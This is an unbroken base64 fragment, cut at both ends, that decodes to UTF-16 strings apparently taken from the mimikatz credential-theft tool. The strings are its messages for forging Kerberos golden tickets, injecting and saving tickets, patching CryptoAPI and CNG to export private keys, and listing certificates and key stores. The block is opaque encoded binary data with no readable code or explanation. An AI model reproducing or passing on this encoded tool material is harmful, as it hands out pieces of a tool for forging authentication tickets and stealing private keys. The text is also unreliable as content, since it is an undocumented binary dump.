BnAHUAbQBlAG4AdAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABEAG8AbQBhAGkAbgAgAG4AYQBtAGUAIABkAG8AZQBzACAAbgBvAHQAIABsAG8AbwBrACAAbABpAGsAZQAgAGEAIABGAFEARABOAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAZABvAG0AYQBpAG4AIABhAHIAZwB1AG0AZQBuAHQACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAHUAcwBlAHIAIABhAHIAZwB1AG0AZQBuAHQACgAAAAAAAAAgACoAIABQAEEAQwAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAAAAAAIAAqACAAUABBAEMAIABzAGkAZwBuAGUAZAAKAAAAAAAgACoAIABFAG4AYwBUAGkAYwBrAGUAdABQAGEAcgB0ACAAZwBlAG4AZQByAGEAdABlAGQACgAAACAAKgAgAEUAbgBjAFQAaQBjAGsAZQB0AFAAYQByAHQAIABlAG4AYwByAHkAcAB0AGUAZAAKAAAAIAAqACAASwByAGIAQwByAGUAZAAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuAF8AZABhAHQAYQAgADsAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGUAbgBjAHIAeQBwAHQAIAAlADAAOAB4AAoAAAAAAAAACQAqACAAJQBzACAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBoAGEAcwBoAF8AZABhAHQAYQAgADsAIABIAGEAcwBoAFAAYQBzAHMAdwBvAHIAZAAgADoAIAAlADAAOAB4AAoAAAAAAGMAbwB1AG4AdAAAAAAAAABYAC0AQwBBAEMASABFAEMATwBOAEYAOgAAAAAAAAAAAAoAUAByAGkAbgBjAGkAcABhAGwAIAA6ACAAAAAAAAAACgAKAEQAYQB0AGEAIAAlAHUAAAAAAAAACgAJACAAIAAgACoAIABJAG4AagBlAGMAdABpAG4AZwAgAHQAaQBjAGsAZQB0ACAAOgAgAAAAAAAKAAkAIAAgACAAKgAgAFMAYQB2AGUAZAAgAHQAbwAgAGYAaQBsAGUAIAAlAHMAIAAhAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAoACQAqACAAJQB3AFoAIABlAG4AdAByAHkAPwAgACoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYwBhAGMAaABlAF8AZQBuAHUAbQAgADsAIABjAGMAYQBjAGgAZQAgAHYAZQByAHMAaQBvAG4AIAAhAD0AIAAwAHgAMAA1ADAANAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAEEAdAAgAGwAZQBhAHMAdAAgAG8AbgBlACAAZgBpAGwAZQBuAGEAbQBlACAAaQBzACAAbgBlAGUAZABlAGQACgAAAAAAAAAAACUAdQAtACUAMAA4AHgALgAlAHMAAAAAACwAAAA9AAAAfAAAAAAAAABDAGwAYQBpAG0AcwBbACUAdQBdAAoAAAAgACAAUwBvAHUAcgBjAGUAVA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BzAHQAIAA7ACAATgBvACAAQgB1AHMAeQBMAGkAZwBoAHQACgAAAHMAbwB1AG4AZAAAAAAAAABjAG8AbABvAHIAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGIAdQBzAHkAbABpAGcAaAB0AF8AcwBpAG4AZwBsAGUAIAA7ACAATgBvACAAQgB1AHMAeQBMAGkAZwBoAHQACgAAAAAAAABwAHIAbwB2AGkAZABlAHIAcwAAAAAAAABMAGkAcwB0ACAAYwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAHAAcgBvAHYAaQBkAGUAcgBzAAAAAAAAAAAAcwB0AG8AcgBlAHMAAAAAAEwAaQBzAHQAIABjAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAcwB0AG8AcgBlAHMAAAAAAAAAYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAAAAAAAAAAABMAGkAcwB0ACAAKABvAHIAIABlAHgAcABvAHIAdAApACAAYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAAAAAAAAAawBlAHkAcwAAAAAAAAAAAEwAaQBzAHQAIAAoAG8AcgAgAGUAeABwAG8AcgB0ACkAIABrAGUAeQBzACAAYwBvAG4AdABhAGkAbgBlAHIAcwAAAAAAcwBjAAAAAAAAAAAATABpAHMAdAAgAHMAbQBhAHIAdABjAGEAcgBkACAAcgBlAGEAZABlAHIAcwAAAAAASABhAHMAaAAgAGEAIABwAGEAcwBzAHcAbwByAGQAIAB3AGkAdABoACAAbwBwAHQAaQBvAG4AYQBsACAAdQBzAGUAcgBuAGEAbQBlAAAAAABEAGUAcwBjAHIAaQBiAGUAIABhACAAVwBpAG4AZABvAHcAcwAgAFMAeQBzAHQAZQBtACAAQwBlAHIAdABpAGYAaQBjAGEAdABlACAAKABmAGkAbABlACwAIABUAE8ARABPADoAcgBlAGcAaQBzAHQAcgB5ACAAbwByACAAaABpAHYAZQApAAAAcwBjAGEAdQB0AGgAAAAAAAAAAAAAAAAAQwByAGUAYQB0AGUAIABhACAAYQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACAAYwBlAHIAdABpAHQAaQBmAGEAdABlACAAKABzAG0AYQByAHQAYwBhAHIAZAAgAGwAaQBrAGUAKQAgAGYAcgBvAG0AIABhACAAQwBBAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABQAGEAdABjAGgAIABDAHIAeQBwAHQAbwBBAFAASQAgAGwAYQB5AGUAcgAgAGYAbwByACAAZQBhAHMAeQAgAGUAeABwAG8AcgB0AAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAUABhAHQAYwBoACAAQwBOAEcAIABzAGUAcgB2AGkAYwBlACAAZgBvAHIAIABlAGEAcwB5ACAAZQB4AHAAbwByAHQAAAAAAAAAAABjAHIAeQBwAHQAbwAAAAAAQwByAHkAcAB0AG8AIABNAG8AZAB1AGwAZQAAAAAAAAByAHMAYQBlAG4AaAAAAAAAQ1BFeHBvcnRLZXkAAAAAAG4AYwByAHkAcAB0AAAAAABOQ3J5cHRPcGVuU3RvcmFnZVByb3ZpZGVyAAAAAAAAAE5DcnlwdEVudW1LZXlzAABOQ3J5cHRPcGVuS2V5AAAATkNyeXB0SW1wb3J0S2V5AE5DcnlwdEV4cG9ydEtleQBOQ3J5cHRHZXRQcm9wZXJ0eQAAAAAAAABOQ3J5cHRTZXRQcm9wZXJ0eQAAAAAAAABOQ3J5cHRGcmVlQnVmZmVyAAAAAAAAAABOQ3J5cHRGcmVlT2JqZWN0AAAAAAAAAABCQ3J5cHRFbnVtUmVnaXN0ZXJlZFByb3ZpZGVycwAAAEJDcnlwdEZyZWVCdWZmZXIAAAAAAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABwAHIAbwB2AGkAZABlAHIAcwAgADoACgAAACUAMgB1AC4AIAAlAC0AMQAzAHMAIAAoACUAMgB1ACkAIAAtACAAJQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcAByAG8AdgBpAGQAZQByAHMAIAA7ACAAQwByAHkAcAB0AEUAbgB1AG0AUAByAG8AdgBpAGQAZQByAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAACgBDAHIAeQBwAHQAbwBBAFAASQAgAHAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAcwA6AAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcAByAG8AdgBpAGQAZQByAHMAIAA7ACAAQwByAHkAcAB0AEUAbgB1AG0AUAByAG8AdgBpAGQAZQByAFQAeQBwAGUAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAEMATgBHACAAcAByAG8AdgBpAGQAZQByAHMAIAA6AAoAAAAAAAAAJQAyAHUALgAgACUAcwAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHAAcgBvAHYAaQBkAGUAcgBzACAAOwAgAEIAQwByAHkAcAB0AEUAbgB1AG0AUgBlAGcAaQBzAHQAZQByAGUAZABQAHIAbwB2AGkAZABlAHIAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAAAAAAAAAAAAcwB5AHMAdABlAG0AcwB0AG8AcgBlAAAAQQBzAGsAaQBuAGcAIABmAG8AcgAgAFMAeQBzAHQAZQBtACAAUwB0AG8AcgBlACAAJwAlAHMAJwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHMAdABvAHIAZQBzACAAOwAgAEMAZQByAHQARQBuAHUAbQBTAHkAcwB0AGUAbQBTAHQAbwByAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAHMAaQBsAGUAbgB0AAAAAABuAG8AawBlAHkAAABNAHkAAAAAAAAAAABzAHQAbwByAGUAAAAAAAAAAAAAAAAAAAAgACoAIABTAHkAcwB0AGUAbQAgAFMAdABvAHIAZQAgACAAOgAgACcAJQBzACcAIAAoADAAeAAlADAAOAB4ACkACgAgACoAIABTAHQAbwByAGUAIAAgACAAIAAgACAAIAAgACAAOgAgACcAJQBzACcACgAKAAAAAAAoAG4AdQBsAGwAKQAAAAAAAAAAAAAAAAAJAEsAZQB5ACAAQwBvAG4AdABhAGkAbgBlAHIAIAAgADoAIAAlAHMACgAJAFAAcgBvAHYAaQBkAGUAcgAgACAAIAAgACAAIAAgADoAIAAlAHMACgAJAFAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAIAAgADoAIAAlAHMAIAAoACUAdQApAAoAAAAAAAAAAAAJAFQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAHIAeQBwAHQARwBlAHQAVQBzAGUAcgBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAGsAZQB5AFMAcABlAGMAIAA9AD0AIABDAEUAUgBUAF8ATgBDAFIAWQBQAFQAXwBLAEUAWQBfAFMAUABFAEMAIAB3AGkAdABoAG8AdQB0ACAAQwBOAEcAIABIAGEAbgBkAGwAZQAgAD8ACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAcgB5AHAAdABBAGMAcQB1AGkAcgBlAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAHIAaQB2AGEAdABlAEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwBlAHIAdABHAGUAdABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAQwBvAG4AdABlAHgAdABQAHIAbwBwAGUAcgB0AHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AEcAZQB0AE4AYQBtAGUAUwB0AHIAaQBuAGcAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AEcAZQB0AE4AYQBtAGUAUwB0AHIAaQBuAGcAIAAoAGYAbwByACAAbABlAG4AKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwBlAHIAdABPAHAAZQBuAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAACgAlADIAdQAuACAAJQBzAAoAAAAAAAAAIAAgACAAIAAlAFMACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzAF8AYwBhAHAAaQAgADsAIABDAHIAeQBwAHQARwBlAHQAVQBzAGUAcgBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAXwBjAGEAcABpACAAOwAgAEMAcgB5AHAAdABHAGUAdABQAHIAbwB2AFAAYQByAGEAbQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AawBlAHkAcwBfAGMAYQBwAGkAIAA7ACAAQwByAHkAcAB0AEEAYwBxAHUAaQByAGUAQwBvAG4AdABlAHgAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcAByAG8AdgBpAGQAZQByAAAAAAAAAAAAcAByAG8AdgBpAGQAZQByAHQAeQBwAGUAAAAAAAAAAAAAAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBvAGYAdAB3AGEAcgBlACAASwBlAHkAIABTAHQAbwByAGEAZwBlACAAUAByAG8AdgBpAGQAZQByAAAAYwBuAGcAcAByAG8AdgBpAGQAZQByAAAAAAAAAAAAAAAgACoAIABTAHQAbwByAGUAIAAgACAAIAAgACAAIAAgACAAOgAgACcAJQBzACcACgAgACoAIABQAHIAbwB2AGkAZABlAHIAIAAgACAAIAAgACAAOgAgACcAJQBzACcAIAAoACcAJQBzACcAKQAKACAAKgAgAFAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAIAA6ACAAJwAlAHMAJwAgACgAJQB1ACkACgAgACoAIABDAE4ARwAgAFAAcgBvAHYAaQBkAGUAcgAgACAAOgAgACcAJQBzACcACgAAAAAAAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABrAGUAeQBzACAAOgAKAAAAAAAKAEMATgBHACAAawBlAHkAcwAgADoACgAAAAAAAAAAAFUAbgBpAHEAdQBlACAATgBhAG0AZQAAACAAIAAgACAAJQBzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAIAA7ACAATgBDAHIAeQBwAHQATwBwAGUAbgBLAGUAeQAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzACAAOwAgAE4AQwByAHkAcAB0AEUAbgB1AG0ASwBlAHkAcwAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AawBlAHkAcwAgADsAIABOAEMAcgB5AHAAdABPAHAAZQBuAFMAdABvAHIAYQBnAGUAUAByAG8AdgBpAGQAZQByACAAJQAwADgAeAAKAAAAAAAAAAAARQB4AHAAbwByAHQAIABQAG8AbABpAGMAeQAAAAAAAABMAGUAbgBnAHQAaAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAHAAcgBpAG4AdABLAGUAeQBJAG4AZgBvAHMAIAA7ACAATgBDAHIAeQBwAHQARwBlAHQAUAByAG8AcABlAHIAdAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcAByAGkAbgB0AEsAZQB5AEkAbgBmAG8AcwAgADsAIABDAHIAeQBwAHQARwBlAHQASwBlAHkAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFkARQBTAAAATgBPAAAAAAAJAEUAeABwAG8AcgB0AGEAYgBsAGUAIABrAGUAeQAgADoAIAAlAHMACgAJAEsAZQB5ACAAcwBpAHoAZQAgACAAIAAgACAAIAAgADoAIAAlAHUACgAAAAAAUgBTAEEAUABSAEkAVgBBAFQARQBCAEwATwBCAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABSAGEAdwBLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABOAEMAcgB5AHAAdABTAGUAdABQAHIAbwBwAGUAcgB0AHkACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AFIAYQB3AEsAZQB5AFQAbwBGAGkAbABlACAAOwAgAE4AQwByAHkAcAB0AEkAbQBwAG8AcgB0AEsAZQB5AAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAUgBhAHcASwBlAHkAVABvAEYAaQBsAGUAIAA7ACAATgBvACAAQwBOAEcAIQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AFIAYQB3AEsAZQB5AFQAbwBGAGkAbABlACAAOwAgAEMAcgB5AHAAdABJAG0AcABvAHIAdABLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEMAQQBQAEkAUABSAEkAVgBBAFQARQBCAEwATwBCAAAATwBLAAAAAABLAE8AAAAAAAkAUAByAGkAdgBhAHQAZQAgAGUAeABwAG8AcgB0ACAAOgAgACUAcwAgAC0AIAAAACcAJQBzACcACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABFAHgAcABvAHIAdAAgAC8AIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABLAGUAeQBUAG8ARgBpAGwAZQAgADsAIABrAHUAaABsAF8